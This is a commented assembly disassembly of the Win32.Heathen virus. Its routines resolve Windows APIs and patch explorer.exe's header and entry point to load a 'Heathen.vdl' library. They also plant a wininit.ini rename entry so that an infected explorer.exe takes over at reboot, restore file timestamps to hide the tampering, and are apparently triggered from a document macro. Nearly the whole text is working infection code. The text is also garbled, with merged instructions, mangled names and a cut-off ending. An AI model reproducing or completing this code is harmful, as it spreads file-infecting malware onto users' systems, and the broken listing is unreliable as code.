Win32.heathen
; ------------------------------------------------- ----------------------------
Some definitions of structures
API_STRUC STRUC
OLE_MEMORYALLOCATOR DD?
GetWindowsDirectorya DD?
CopyFilea DD?
DELETEFILEA DD?
CREATEFILEA DD?
READFILE DD?
Writefile DD?
CloseHandle DD?
SETFILEPOINTER DD?
GetFileTime DD?
SETFILETIME DD?
LSTRCATA DD?
LSTRCPYA DD?
LSTRCMPA DD?
LSTRLENA DD?
STGOPENSTORAGE DD?
STGCREATEDOCFILE DD?
Cogether Malloc DD?
API_STRUC ENDS
; ------------------------------------------------- ----------------------------
WIN32_FIND_DATA_STRUC STRUC
DWFileAttributes DD?
FTCREATIONTIME DQ?
FTLASTACCESSTIME DQ?
FTLASTWRITETIME DQ?
NFILESIZEHIGH DD?
NFILESZELOW DD?
DWRESERVED0 DD?
DWRESERVED1 DD?
CFILENAME DB 80 DUP (?)
CalternateFileName DB 14 DUP (?)
WIN32_FIND_DATA_STRUC ENDS
; ------------------------------------------------- ----------------------------
Statg_struc struc
PWCSNAME DD?
TYPE DD?
CBSIZE DQ?
MTIME DQ?
CTIME DQ?
ATIME DQ?
GrfMode DD?
GrflockSsuPorted DD?
CLSID DB 16 DUP (?)
GrfStateBits DD?
DWSTGFMT DD?
Statg_struc Ends
; ------------------------------------------------- ----------------------------
DirectoryStruc Struc
DIRECTORYNAME DD?
NextDirectoryStruc DD?
DirectoryStruc Ends
; ------------------------------------------------- ----------------------------
IlockBytes_Interface struct
QueryInterface DD?
AddRef DD?
RELEASE DD?
READAT DD?
WRITEAT DD?
Flush DD?
Setsize dd?
LOCKREGION DD?
UNLOCKREGON DD?
STAT DD?
IlockBytes_Interface Ends
; ------------------------------------------------- ----------------------------
WNDCLASS_STRUC STRUC
STYLE DD?
LPFNWNDPROC DD?
CBCLSEXTRA DD?
CBWndextra DD?
Hinstance DD? Hicon DD?
HCURSOR DD?
HBRBACKGROUND DD?
LPSZMENUNAME DD?
LPSZCLASSNAME DD?
WNDCLASS_STRUC ENDS
; ------------------------------------------------- ----------------------------
IMPORT STRUC
OriginalFirstthunk DD?
TIMEDATESTAMP DD?
ForwarderChain DD?
Dllname DD?
Firstthunk DD?
IMPORT ENDS
; ------------------------------------------------- ----------------------------
Section Struc
Name DB 8 DUP (?)
Virtualsize DD?
VirtualAddress DD?
SIZEOFRAWDATA DD?
PointertorawData DD?
PointertoreLocations DD?
PointertolinenumBers DD?
NUMBEROFRELOCATIONS DW?
NUMBEROFLINENUMBERS DW?
CHARACTERISTICS DD?
Section ends
; ------------------------------------------------- ----------------------------
Imalloc_interface struct
QueryInterface DD?
AddRef DD?
RELEASE DD?
PREALLOC DD?
Postalloc DD?
PREFREE DD?
PostFree DD?
PreractOC DD?
PostRealloc DD?
PREGETSIZE DD?
Postgetsize DD?
PrediDalloc DD?
PostDidalloc DD?
PREHEAPMINIMIZE DD?
POSTHEAPMINIMIZE DD?
IMalloc_Interface Ends
; ------------------------------------------------- ----------------------------
ISTREAM_INTERFACE STRUC
QueryInterface DD?
AddRef DD?
RELEASE DD?
READ DD?
Write DD?
Seek DD?
Setsize dd?
COPYTO DD?
COMMIT DD?
Revert dd?
LOCKREGION DD?
UNLOCKREGON DD?
STAT DD?
CLONE DD?
ISTREAM_INTERFACE ENDS
; ------------------------------------------------- ----------------------------
IStorage_Interface Struc
QueryInterface DD?
AddRef DD?
RELEASE DD?
CREATESTREAM DD?
OpenStream DD?
CREATESTORAGE DD?
OpenStorage DD?
COPYTO DD?
MOVEELEMENTTO DD?
COMMIT DD?
Revert dd?
ENUMELEMENTS DD?
DESTROYEELEMENT DD?
RenameElement DD?
SETELEMENTTIMES DD?
SetClass DD?
SETSTATEBITS DD?
STAT DD?
IStorage_Interface Ends
;
File name: Heathen.vdl
Format: Portable Executable (PE)
; Section 1. Virtual Address 00001000)
Virtual size: 00002000 (8192.)
Section size in file: 00001600 (5632.)
Offset to Raw Data for section: 00000600
Flags 60000020: Text Executable Readable
ALIGNMENT: 16 BYTES?
Unicode Macro Page, String, Zero
IRPC C,
DB '& C', PAGE
ENDM
IFNB
DW Zero
ENDIF
ENDM
P586
Model flat
; ------------------------------------------------- ----------------------------
; Segment Type: Pure Code
Code segment para public 'code' USE32
Assume CS: CODE
ORG 401000H
Assume ES: Nothing, SS: Nothing, DS: Nothing, Fs: Nothing, GS: Nothing
; --------------- Subroutine --------------------------------- --------
Virus Macro Calls this Routine THROUGH CALLBACK24 API
Attributes: bp-based frame
Callback24_code proc Near
Heathen_base = DWORD PTR 8
ActiveDocument = DWORD PTR 0CH
GetProcaddress = DWORD PTR 10H
KERNEL32 = DWORD PTR 14H
OLE32 = DWORD PTR 18H
Push EBP
MOV EBP, ESP
Pusha
Push [EBP OLE32]
Push [EBP KERNEL32]
Push [EBP GETPROCADDRESS]
Push [EBP ACTIVEDOCUMENT]
MOV EAX, [EBP Heathen_Base]
Push EAX
MOV EBX, EAX
Add EBX, 663H; EBX = RAW Offset of Explorer Patch Code, Equivalent TO Virtual Address 401063H
Push EBX
SUB EAX, 401400H; VADATA-403000H = Rawdata-1C00H ==> Rawdata = VADATA - 401400H
Push EAX
Call Installvirus
POPA
POP EBP
Retn 14h
Callback24_code endp
; --------------- Subroutine --------------------------------- --------
Attributes: bp-based frame
ASCIZ_TO_UNICODE PROC NEAR
Asciiz = DWORD PTR 8
Unicode = DWORD PTR 0CH
Push EBP
MOV EBP, ESP
Pusha
XOR EAX, EAX
MOV ESI, [EBP ASCIZ]
MOV EDI, [EBP Unicode]
CLD
Nextcharacter:
Lodsb
Stosw; Convert to Unicode, for use with ole functions
OR EAX, EAX
Jnz Short Nextcharacter
POPA
POP EBP
Retn
ASCIZ_TO_UNICODE ENDP
; --------------- Subroutine --------------------------------- --------
Attributes: bp-based frame
Uppercase Proc Near
Asciiz_string = dword PTR 8
Push EBP
MOV EBP, ESP
Push EAX
PUSH ESI
MOV ESI, [EBP ASCIIZ_STRING]
Next_Character:
MOV Al, [ESI]
CMP Al, 'A'
JB Short NotllowerCase
CMP Al, 'Z'
Ja Short NotLowerCase
SUB Al, 20h; Convert Tu Uppercase
MOV [ESI], Al
NotLowerCase:
Inc ESI
OR Al, Al
Jnz Short Next_Character
POP ESI
POP EAX
POP EBP
Retn
Uppercase endp
; --------------- Subroutine --------------------------------- --------
Explorer_patch_code proc Near
Pusha; Save Registers
Library_name:
Push 0; VA Address of string "Heathen.VDL"
API_NAME:
Mov Eax, 0; VA of LoadLibrarya API
Call dword PTR [EAX]
POPA; Restore Registers
Old_ENTRYPOINT:
Push 0; Original EntryPoint of Explorer.exe
Retn
Explorer_patch_code endp
; ------------------------------------------------- ----------------------------
AHEATHEN_VDL_0 DB 'Heathen.vdl'
DB 0
Encrypted_text db 0A8H, 0B8H, 0CFH, 0C8H, 0DFH, 0DDH, 0B7H, 9AH
DB 9EH, 8BH, 97H, 9AH, 91H, 0DDH, 0DFH, 0BCH
DB 90H, 8FH, 86H, 8DH, 96H, 98H, 97H, 8BH
DB 0DFH, 0D7H, 0BCH, 0D6H, 0DFH, 0CEH, 0C6H, 0C6H
DB 0CAH, 0D2H, 0CEH, 0C6H, 0C6H, 0C6H, 0DFH, 9DH
DB 86H, 0DFH, 0A8H, 90H, 90H, 9BH, 0B8H, 90H
DB 9DH, 93H, 96H, 91H, 0DBH
Assume DS: Nothing
; --------------- Subroutine --------------------------------- --------
Attributes: bp-based framepublic DLL_ENTRYPOINT
DLL_ENTRYPOINT Proc Near
Hinstdll = DWORD PTR 8
FDWREASON = DWORD PTR 0CH
LPVRESERVED = DWORD PTR 10H
Push ebp; this is the entrypoint of heathen.vdl library
MOV EBP, ESP
Push [EBP FDWREASON]; Reason for Calling Function
Push [EBP Hinstdll]; Handle of DLL Module
Call dllmain
POP EBP
Retn 0ch
DLL_ENTRYPOINT ENDP
; ------------------------------------------------- ----------------------------
ALIGN 4
; --------------- Subroutine --------------------------------- --------
Attributes: bp-based frame
Getapiaddresses Proc Near
APIS = DWORD PTR 8
GetProcaddress = DWORD PTR 0CH
Va2raw = dword ptr 10h
KERNEL32 = DWORD PTR 14H
OLE32 = DWORD PTR 18H
Push EBP
MOV EBP, ESP
Push EBX
PUSH ESI
Push EDI
Mov Eax, Offset AgetWindowsDirectorya; VirtualAddress of Api Name
MOV EDI, [EBP VA2RAW]; Delta To Convert Va Into Raw Offset (Where ITS Located In Memory)
Mov ESI, [EBP GETPROCADDRESS]
Add Eax, EDI
MOV EBX, [EBP API]
Push Eax; API Name
Push [EBP KERNEL32]; Module Handle
Call ESI
MOV [EBX API_STRUC.GETWINDOWSDIRECTORYA], EAX
Mov Edx, Offset AcopyFilea
Add Edx, EDI
Push Edx; API Name
Push [EBP KERNEL32]; kernel32 base
Call ESI
MOV [EBX API_STRUC.COPYFILEA], EAX
MOV ECX, Offset Deletefilea
Add ECX, EDI
Push Ecx; API Name
Push [EBP KERNEL32]; kernel32 base
Call ESI
MOV [EBX API_STRUC.DELETEFILEA], EAX
Mov Eax, Offset AcreateFilea
Add Eax, EDI
Push Eax; API Name
Push [EBP KERNEL32]; kernel32 base
Call ESI
MOV [EBX API_STRUC.CREATEFILEA], EAX
Mov Edx, Offset areadfile
Add Edx, EDI
Push Edx; API Name
Push [EBP KERNEL32]; kernel32 base
Call Esimov [EBX API_STRUC.READFILE], EAX
Mov ECX, Offset AWRITEFILE
Add ECX, EDI
Push Ecx; API Name
Push [EBP KERNEL32]; kernel32 base
Call ESI
MOV [EBX API_STRUC.WRITEFILE], EAX
Mov Eax, Offset Aclosehandle
Add Eax, EDI
Push Eax; API Name
Push [EBP KERNEL32]; kernel32 base
Call ESI
MOV [EBX API_STRUC.CLOSEHANDLE], EAX
Mov Edx, Offset AsetFilePointer
Add Edx, EDI
Push Edx; API Name
Push [EBP KERNEL32]; kernel32 base
Call ESI
MOV [EBX API_STRUC.SETFILEPOINTER], EAX
Mov ECX, Offset AgetFileTime
Add ECX, EDI
Push Ecx; API Name
Push [EBP KERNEL32]; kernel32 base
Call ESI
MOV [EBX API_STRUC.GETFILETIME], EAX
Mov Eax, Offset AsetFileTime
Add Eax, EDI
Push Eax; API Name
Push [EBP KERNEL32]; kernel32 base
Call ESI
MOV [EBX API_STRUC.SETFILETIME], EAX
Mov Edx, Offset AlStrcata
Add Edx, EDI
Push Edx; API Name
Push [EBP KERNEL32]; kernel32 base
Call ESI
MOV [EBX API_STRUC.LSTRCATA], EAX
Mov ECX, Offset Alstrcpya
Add ECX, EDI
Push Ecx; API Name
Push [EBP KERNEL32]; kernel32 base
Call ESI
MOV [EBX API_STRUC.LSTRCPYA], EAX
Mov Eax, Offset AlstrCMPA
Add Eax, EDI
Push Eax; API Name
Push [EBP KERNEL32]; kernel32 base
Call ESI
MOV [EBX API_STRUC.LSTRCMPA], EAX
Mov Edx, Offset Alstrlena
Add Edx, EDI
Push Edx; API Name
Push [EBP KERNEL32]; kernel32 base
Call ESI
MOV [EBX API_STRUC.LSTRLENA], EAX
Mov ECX, Offset AstgopenStorage
Add ECX, EDI
Push Ecx; API Name
Push [EBP OLE32]; OLE32 BASE
Call ESI
MOV [EBX API_STRUC.STGOPENSTORAGE], EAX
Mov Eax, Offset AstgcreatedocFile
Add Eax, EDI
Push Eax; API Name
Push [EBP OLE32]; OLE32 BASE
Call ESI
MOV [EBX API_STRUC.STGCREATEDOCFILE], EaxAdd Edi, Offset Acogetmalloc
Push EDI; API Name
Push [EBP OLE32]; OLE32 BASE
Call ESI
MOV [EBX API_STRUC.COGETMALLOC], EAX
Push Ebx; Store In First Field of API_STRUC A Pointer To The Memory Allocator
Push 1; MUST BE 1
Call [EBX API_STRUC.COGETMALLOC]; Retrieves a Pointer to the Default Ole Task Memory Allocator
POP EDI
POP ESI
POP EBX
POP EBP
Retn
Getapiaddresses Endp
; --------------- Subroutine --------------------------------- --------
Attributes: bp-based frame
Patchexplorer Proc Near
Peheader = byte PTR-15H
MzHeader = byte PTR -78H
PimportDirectory = DWORD PTR-38H
LoadLibrarya_Present = DWORD PTR-34H
Reloc_section = DWORD PTR-30H
Malloc_idata = DWORD PTR-2CH
Malloc_sections = dword ptr-28h
ReadBytes = DWORD PTR-24H
Writetime = Qword PTR -20H
Accriptiontime = Qword PTR-18H
CreationTime = Qword PTR-10H
FileHandle = DWORD PTR-8
Error = DWORD PTR-4
APIS = DWORD PTR 8
Windows_heathenvex = dword PTR 0CH
API_LOADLIBRARYA = DWORD PTR 10H
Module_kernel32 = DWORD PTR 14H
Patch_rawoffset = DWORD PTR 18H
Push EBP
MOV EBP, ESP
Add ESP, 0FFFFFEE0H
XOR EAX, EAX
Push EBX
PUSH ESI
Push EDI
MOV ESI, [EBP APIS]
MOV [EBP Error], EAX
Push 0; null
Push 10000000H; file_flag_random_access (To Optimize File Caching)
Push 3; Open_EXISTING
Push 0; null = handle cannot be inherited
PUSH 0; 0 = prevent file from being shared
PUSH 0C0000000H; Generic_Read generic_write
Push [eBP windows_heathenvex]
Call [ESI API_STRUC.CREATEFILEA]; OPEN FILEA
MOV [EBP FILEHANDLE], EAX; File Handle
Lea Edx, [EBP WRITETIME]
Push Edx
Lea ECX, [EBP Accriptiontime] Push ECX
Lea Eax, [EBP CREATIONTIME]
Push EAX
Push [EBP FILEHANDLE]
Call [ESI API_STRUC.GETFILETIME]; getFileTime
Lea Edx, [EBP ReadBytes]; Actual Number of Bytes Read
Push 0; null
Push Edx
Lea ECX, [EBP MZHeader]; Buffer for MZ Header
Push 40h; Number of Bytes To Read
Push ECX
Push [EBP FILEHANDLE]
Call [ESI API_STRUC.READFILE]; Read MZ Header
PUSH 0
PUSH 0
Push DWORD PTR [EBP MZHEADER 3CH]; Read Pointer to New Executable HEADER
Push [EBP FILEHANDLE]
Call [ESI API_STRUC.SETFILEPOINTER]; Set File Pointer to Beginning Of Pe Header
Lea Eax, [EBP ReadBytes]
PUSH 0
Push EAX
Lea Edx, [EBP Peheader]
Push 0A8H; Read A8H BYTES OF Pe Header
Push Edx
Push [EBP FILEHANDLE]
Call [ESI API_STRUC.READFILE]; ReadFile
MOV ECX, DWORD PTR [EBP Peheader 28h]; Entrypoint
CMP ECX, DWORD PTR [EBP PEHEADER 0A0H]; Relocs Start
JNZ Short Error11; Both Must Be Different from Zero!
Push [EBP FILEHANDLE]
Call [ESI API_STRUC.CLOSEHANDLE]; Close File
XOR EAX, EAX; Return with Error
JMP Error10
; ------------------------------------------------- ----------------------------
Error11:
Movzx EDX, Word PTR [EBP Peheader 6]; Number of Sections
MOV ECX, EDX
SHL ECX, 3
Lea ECX, [ECX ECX * 4]; ECX = SIZE OF SECTIONS
Push Ecx; Number of Bytes To Reserve
MOV EAX, [ESI]
Push Eax; IMalloc
Mov Edx, [EAX]
Call [EDX IMALLOC_INTERFACE.PREALLOC]; Reserve Memory for Sections
MOV [EBP Malloc_sections], EAX; Pointer to Buffer of Sections
Push DWORD PTR [EBP PEHEADER 84H]; Idata (Import Section) Size
MOV ECX, [ESI]
Push ECX
Mov Eax, [ECX]
Call [EAX IMALLOC_INTERFACE.PREALLOC]; Reserve Memory for iData Sectionmov [EBP MALLOC_IDATA], EAX; Pointer to Buffer of iData
CMP [EBP MALLOC_SECTIONS], 0; MALLOC OK?
JZ Short Error12
CMP [EBP MALLOC_IDATA], 0; Malloc OK?
Jnz Short Malloc_ok
Error12:
Push [EBP FILEHANDLE]
Call [ESI API_STRUC.CLOSEHANDLE]; Close File
XOR EAX, EAX; Return with Error
JMP Error10
; ------------------------------------------------- ----------------------------
Malloc_ok:
Push 0; file_begin
Push 0; High DWord of File Pointer
Movzx EDX, Word PTR [EBP Peheader 14h]; NT Optional Header Size
Add Edx, DWORD PTR [EBP MZHEADER 3CH]; Offset of Pe Header
Add EDX, 18H; Size of PE File HE FITER
Push Edx; Low DWORD OF File Pointer
Push [EBP FILEHANDLE]
Call [ESI API_STRUC.SETFILEPOINTER]; setFilePointer
Push 0; null
Lea ECX, [EBP ReadBytes]
Push ECX
Movzx Eax, Word PTR [EBP Peheader 6]; Number of Sections
Mov Edx, EAX
SHL EDX, 3
Lea EDX, [EDX EDX * 4]; EDX = SIZE OF Sections
Push Edx
Push [EBP Malloc_sections]; Buffer to Store Info of Sections
Push [EBP FILEHANDLE]
Call [ESI API_STRUC.READFILE]; Read Sections Table
Movzx Eax, Word PTR [EBP PEHEADER 6]
Dec EAX
Test Eax, EAX
Jl Short Found_IData
Check_next_section:
Lea Edx, [EAX EAX * 4]
MOV ECX, [EBP Malloc_sections]]
MOV EDX, [ECX EDX * 8 Section.VirtualAddress]
CMP EDX, DWORD PTR [EBP PEHEADER 80H]
Jle Short Found_IData; RVA Inside Idata
Dec EAX
Test Eax, EAX
JGE Short Check_next_section
Found_idata:
Movzx ECX, Word PTR [EBP PEHEADER 6]
Dec Ecx; Last Section
MOV [EBP RELOC_SECTION], ECX
CMP [EBP RELOC_SECTION], 0
Jl short found_relocscheck_next_section2:
MOV EDX, [EBP RELOC_SECTION]
Lea EDX, [EDX EDX * 4]
MOV ECX, [EBP Malloc_sections]]
MOV EDX, [ECX EDX * 8 Section.VirtualAddress]
CMP EDX, DWORD PTR [EBP PEHEADER 0A0H]; RVA of Relocs
Jle Short Found_relocs; Reloc Section Found!
Dec [EBP RELOC_SECTION]
CMP [EBP RELOC_SECTION], 0
JGE Short Check_next_section2
Found_relocs:
Push 0; file_begin
PUSH 0
Lea EDX, [EAX EAX * 4]; EAX = Idata Section Number
MOV ECX, [EBP Malloc_sections]]
Mov Eax, [EBP MALLOC_SECTIONS]
MOV EBX, DWORD PTR [EBP Peheader 80h]; Idata RVA
Sub EBX, [ECX EDX * 8 Section.VirtualAddress]
Add EBX, [EAX EDX * 8 Section.PointertorawData]
Push Ebx; Raw Offset of iData
Push [EBP FILEHANDLE]
Call [ESI API_STRUC.SETFILEPOINTER]; Set File Pointer to Beginning Odata
Push 0; null
Lea Edx, [EBP ReadBytes]
Push Edx
Push DWORD PTR [EBP PEHEADER 84H]; SIZE OF IDATA
Push [EBP MALLOC_IDATA]; Buffer to Read Idata Info
Push [EBP FILEHANDLE]
Call [ESI API_STRUC.READFILE]; Read All Idata
XOR ECX, ECX
MOV [EBP LOADLIBRARYA_PRESENT], ECX
MOV EAX, [EBP MALLOC_IDATA]
MOV [EBP PIMPORTDIRECTORY], EAX; Actual Import Directory
JMP next_importentry2
; ------------------------------------------------- ----------------------------
Check_importentry:
MOV EBX, EAX
Add EBX, [EBP MALLOC_IDATA]; Start of iData Buffer
SUB EBX, DWORD PTR [EBP Peheader 80h]; (this is Because Buffer May Have Not Been Read At Start of iData Section)
Push EBX
Call Uppercase; Convert All to Uppercase
POP ECX
Push [EBP MODULE_KERNEL32]; kernel32.dll name
Push EBX
Call [ESI API_STRUC.LSTRCMPA]; Compare DLL NameTest Eax, EAX
Jnz short next_importentry; not the same
MOV EAX, [EBP PIMPORTDIRECTORY]
MOV EDI, [Eax Import.originalFirstthunk]; EDI = RVA of Import Lookup Table
Add Edi, [EBP MALLOC_IDATA]
Sub EDI, DWORD PTR [EBP Peheader 80h]; EDI = Converted to Raw Offset
XOR EBX, EBX; EBX = 0 = Start of Array
JMP Short Next_api0
; ------------------------------------------------- ----------------------------
More_apis:
Test Eax, EAX
Jle short next_api; its not imported by name
Add Eax, [EBP MALLOC_IDATA]
SUB EAX, DWORD PTR [EBP PEHEADER 80H]
Add Eax, 2; SKIP Hint Field
Push [EBP API_LOADLIBRARYA]; "LoadLibrarya"
Push EAX
Call [ESI API_STRUC.LSTRCMPA]; Compare API Name
Test Eax, EAX
JNZ Short Next_API; NOT THE SAME
MOV EAX, [EBP PIMPORTDIRECTORY]
MOV ECX, EBX
SHL ECX, 2
Mov Edx, [EAX Import.Firstthunk]; RVA of Import Address Table
MOV EAX, Offset API_NAME 1
Add Edx, Ecx; Select Corresponding RVA from Array of Rvas
Sub Eax, Offset Explorer_patch_code; start of bytes That Will Be Written to Explorer.exe
Add Eax, [EBP PATCH_RAWOFFSET]; EntryPoint of That Routine
Add Edx, DWORD PTR [EBP PEHEADER 34H]; Add ImageBase
MOV [EAX], EDX; RVA WHERE LOADLIBRARYA Address Will Be Stored
XOR EDX, EDX
MOV [EBP LOADLIBRARYA_PRESENT], 1; LoadLibrarya Found!: D
MOV [EDI EBX * 4 4], EDX; Make Next API Entry Null, SO IT EXITS Quickly, Because The LoadLibrary Has Already Been Found!; D
XOR EAX, EAX
MOV ECX, [EBP PIMPORTDIRECTORY]
MOV [ECX 20H], EX; Make Next Import Entry Null To EXIT Quickly, We No. Have What We need; D
Next_api:
Inc EBX
NEXT_API0:
MOV EAX, [EDI EBX * 4]
Test Eax, EAX
Jnz short more_apis; Still More Imported Apis To Check
Next_IMPORTENTRY:
Add [EBP PIMPORTDIRECTORY], 14H; Next Import Entry
Next_importentry2:
MOV EDX, [EBP PIMPORTDIRECTORY]; actual import entry
MOV Eax, [EDX Import.dllname]; RVA of Imported DLL Name
Test Eax, EAX
JNZ Check_Importiff; Check these DLL Imports
CMP [EBP LOADLIBRARYA_PRESENT], 0
JZ Error13; Error, LoadLibrarya Not Imported
Mov Edx, Offset Aheathen_vdl_0
MOV ECX, Offset Library_name 1
Add Edx, DWORD PTR [EBP PEHEADER 0A0H]
Sub ECX, Offset Explorer_patch_code
Add ECX, [EBP PATCH_RAWOFFSET]; ECX = Location In Memory That Contains VA (for Explorer.exe) of Library Name
Sub Edx, Offset Explorer_patch_code
Add Edx, DWORD PTR [EBP PEHEADER 34H]; EDX = Virtual Address (when Executing Explorer.exe) of Library Name
MOV EAX, Offset Old_EntryPoint 1
MOV [ECX], EDX; Store That Virtual Address in the Patch Code
SUB Eax, Offset Explorer_patch_code
Add Eax, [EBP PATCH_RAWOFFSET]; EAX = location in Memory That Contains Va (for Explorer.exe) of its Original Entrypoint
MOV EDX, DWORD PTR [EBP Peheader 28h]
Add Edx, DWORD PTR [EBP PEHEADER 34H]; EDX = Original Entrypoint
Mov [EAX], EDX; Store Old Entrypoint in the Patch Code
Push 0; file_begin
PUSH 0
MOV EAX, [EBP RELOC_SECTION]; Number of the Reloc Section
MOV EDX, [EBP Malloc_sections]; Buffer of Sections Table
MOV ECX, DWORD PTR [EBP Peheader 0a0h]; RVA of Relocs
Lea Eax, [EAX EAX * 4]
SUB ECX, [EDX EAX * 8 Section.VirtualAddress]; Relative RVA from Beginning of Reloc Section
Mov Edx, [EBP MALLOC_SECTIONS]
Add ECX, [EDX EAX * 8 Section.PointertorawData]; ECX = RAW Offset of Start of Relocspush ECX
Push [EBP FILEHANDLE]
Call [ESI API_STRUC.SETFILEPOINTER]; Set File Pointer to Start of Relocs Blocks
Push 0; null
Lea EAX, [EBP ReadBytes]; Here Will Be Returned The Actual Number of Bytes Written
Push EAX
MOV ECX, Offset Encrypted_Text
Sub ECX, Offset Explorer_patch_code; ECX = Size of Code to Patch
Push ECX
Push [EBP PATCH_RAWOFFSET]
Push [EBP FILEHANDLE]
Call [ESI API_STRUC.WRITEFILE]; WRITE PATCH CODE AT Beginning Of Relocs Blocks
MOV EAX, DWORD PTR [EBP PEHEADER 0A0H]
MOV DWORD PTR [EBP Peheader 28h], EAX; Set New Entrypoint to Point To The Virus Routine ;-)
Push 0; file_begin
PUSH 0
Push DWORD PTR [EBP MZHEADER 3CH]
Push [EBP FILEHANDLE]
Call [ESI API_STRUC.SETFILEPOINTER]; Set File Pointer to Peheader Start
Lea Edx, [EBP ReadBytes]
PUSH 0
Push Edx
Lea ECX, [EBP Peheader]
Push 0A8H; Size of pehader
Push ECX
Push [EBP FILEHANDLE]
Call [ESI API_STRUC.WRITEFILE]; WRITE PE HEHEER
MOV [EBP ERROR], 1; Indicate We Have Patch Explorer.exe SuccessFully
Error13:
Push [EBP Malloc_sections]
MOV EAX, [ESI]
Push EAX
Mov Edx, [EAX]
Call [EDX IMALLOC_INTERFACE.PREFREE]; Free Memory
Push [ebp malloc_idata]
MOV ECX, [ESI]
Push ECX
Mov Eax, [ECX]
Call [Eax Imalloc_Interface.prefree]; Free Memory
Lea Edx, [EBP WRITETIME]
Push Edx
Lea ECX, [EBP Accriptiontime]
Push ECX
Lea Eax, [EBP CREATIONTIME]
Push EAX
Push [EBP FILEHANDLE]
Call [ESI API_STRUC.SETFILETIME]; Restore File Time
Push [EBP FILEHANDLE]
Call [ESI API_STRUC.CLOSEHANDLE]; Close Handle
MOV EAX, [EBP Error]; Return Errorerror10:
POP EDI
POP ESI
POP EBX
MOV ESP, EBP
POP EBP
Retn
PatChexplorer ENDP
; --------------- Subroutine --------------------------------- --------
Attributes: bp-based frame
Createwininit Proc Near
String = byte PTR-260H
Byteswritten = DWORD PTR -8
Character_Equal = DWORD PTR-4
APIS = DWORD PTR 8
Windows_wininitini = dword PTR 0CH
Windows_explorerexe = DWORD PTR 10H
Windows_heathenvex = dword PTR 14H
Heathen_base = dword PTR 18H
Push EBP
MOV EBP, ESP
Add ESP, 0FFFFDA0H
Mov Eax, Offset Arename
Lea Edx, [EBP STRING]
Push EBX
PUSH ESI
Add Eax, [EBP Heathen_Base]
MOV EBX, [EBP APIS]; Apis Array
Push EAX
Push Edx
Call [EBX API_STRUC.LSTRCPYA]; CREATE Section [Rename]
Push [EBP Windows_explorerexe]
LEA ECX, [EBP STRING]
Push ECX
Call [EBX API_STRUC.LSTRCATA]; add "c: windowsexplorer.exe"
MOV [EBP Character_Equal], '='
Lea Eax, [EBP CHARACTER_EQUAL]
Lea Edx, [EBP STRING]
Push EAX
Push Edx
Call [EBX API_STRUC.LSTRCATA]; add "="
Push [eBP windows_heathenvex]
LEA ECX, [EBP STRING]
Push ECX
Call [EBX API_STRUC.LSTRCATA]; add "c: windowsheathen.vex"
Push 0; null
Push 20h; file_attribute_archive
Push 2; Create_ALWAYS
Push 0; null = file handle cannot be inherited
PUSH 0; 0 = prevent file from being shared
Push 40000000H; Generic_Write
Push [EBP Windows_Wininitini]
Call [EBX API_STRUC.CREATEFILEA]; CREATE FILE "C: Windowswininit.ini"
Mov ESI, EAX
Push 0; null
Lea Eax, [EBP BYteswritten]; actual number of bytes Written
Push EAX
Lea Edx, [EBP STRING]
Push Edx
Call [EBX API_STRUC.LSTRLENA]; Get Length of String to Writepush Eax; Number of Bytes To Write
LEA ECX, [EBP STRING]
Push Ecx; Buffer for Write
Push ESI; File Handle
Call [EBX API_STRUC.WRITEFILE]
PUSH ESI
Call [EBX API_STRUC.CLOSEHANDLE]; Close File
POP ESI
POP EBX
MOV ESP, EBP
POP EBP
Retn
CreateWininit Endp
; --------------- Subroutine --------------------------------- --------
; Tris routine install virus in system, so next reboot explorer.exe will load heat heathen.vdl library
Attributes: bp-based frame
Installvirus Proc Near
Buffer = byte ptr-0e28h
Unicode_heathenvdo = byte PTR-0C28H
Unicode_htmpdoc = byte PTR -9D0H
Windows_wininitini = byte PTR-778H
Windows_heathenvdo = byte PTR-64CH
Windows_heathevdl = byte PTR-520H
Windows_heathenvex = byte PTR-3F4H
Windows_explorerexe = Byte PTR-2C8H
Windows_htmpdoc = byte PTR-19CH
APIS = API_STRUC PTR-70H
Writtenbytes = dword PTR-28H
FileHandle = DWORD PTR-24H
Streamseek = Qword PTR -20H
Macrossize = dWord PTR-18H
Macrosoffset = DWORD PTR-14H
Xtable = DWORD PTR-10H
IStream1 = DWORD PTR-0CH
IStorage2 = DWORD PTR-8
IStorage1 = DWORD PTR-4
Va2raw = dword PTR 8
PATCH_CODE = DWORD PTR 0CH
Heathen_base = dword PTR 10h
ActiveDocument = DWORD PTR 14H
GetProcaddress = DWORD PTR 18H
KERNEL32 = DWORD PTR 1CH
OLE32 = DWORD PTR 20H
Push EBP
MOV EBP, ESP
Add ESP, 0FFFFF1D8H; Suck Stack! Yeah! 8-P
Push EBX
PUSH ESI
Push EDI
MOV EBX, [EBP VA2RAW]
Push [EBP OLE32]
Push [EBP KERNEL32]
Push EBX
Push [EBP GETPROCADDRESS]
Lea Eax, [EBP APIs]; Address to Store API Addresses
Push EAX
Call getapiaddresses; Get All Apisadd ESP, 14H
Lea Edx, [EBP Windows_HTMPDoc]
Push 12ch; buffer size
Push Edx
Call [EBP APIS.GETWINDOWSDIRECTORYA]; Get Windows Directory, And Store IT IN 6 BUFFERS
Lea ECX, [EBP Windows_htmpdoc]
Lea Eax, [EBP Windows_explorerexe]
Push ECX
Push EAX
Call [EBP APIS.LSTRCPYA]
Lea Edx, [EBP Windows_HTMPDoc]
Lea ECX, [EBP Windows_heathenVex]
Push Edx
Push ECX
Call [EBP APIS.LSTRCPYA]
Lea Eax, [EBP Windows_HTMPDOC]
Lea Edx, [EBP Windows_heathevdl]
Push EAX
Push Edx
Call [EBP APIS.LSTRCPYA]
Lea ECX, [EBP Windows_htmpdoc]
Lea Eax, [EBP Windows_Heathenvdo]
Push ECX
Push EAX
Call [EBP APIS.LSTRCPYA]
Lea Edx, [EBP Windows_HTMPDoc]
Lea ECX, [EBP Windows_Wininitini]
Push Edx
Push ECX
Call [EBP APIS.LSTRCPYA]
MOV EAX, Offset Ahtmp_Doc
Lea Edx, [EBP Windows_HTMPDoc]
Add Eax, EBX
Push EAX
Push Edx
Call [EBP APIS.LSTRCATA]; C: Windowshtmp.doc
MOV ECX, Offset aexplorer_exe
Lea Eax, [EBP Windows_explorerexe]
Add ECX, EBX
Push ECX
Push EAX
Call [EBP APIS.LSTRCATA]; C: Windows Explorer.exe
Mov Edx, Offset Aheathen_Vex
Lea ECX, [EBP Windows_heathenVex]
Add Edx, EBX
Push Edx
Push ECX
Call [EBP APIS.LSTRCATA]; C: WindowsHeathen.Vex
Mov Eax, Offset Aheathen_VDL
Lea Edx, [EBP Windows_heathevdl]
Add Eax, EBX
Push EAX
Push Edx
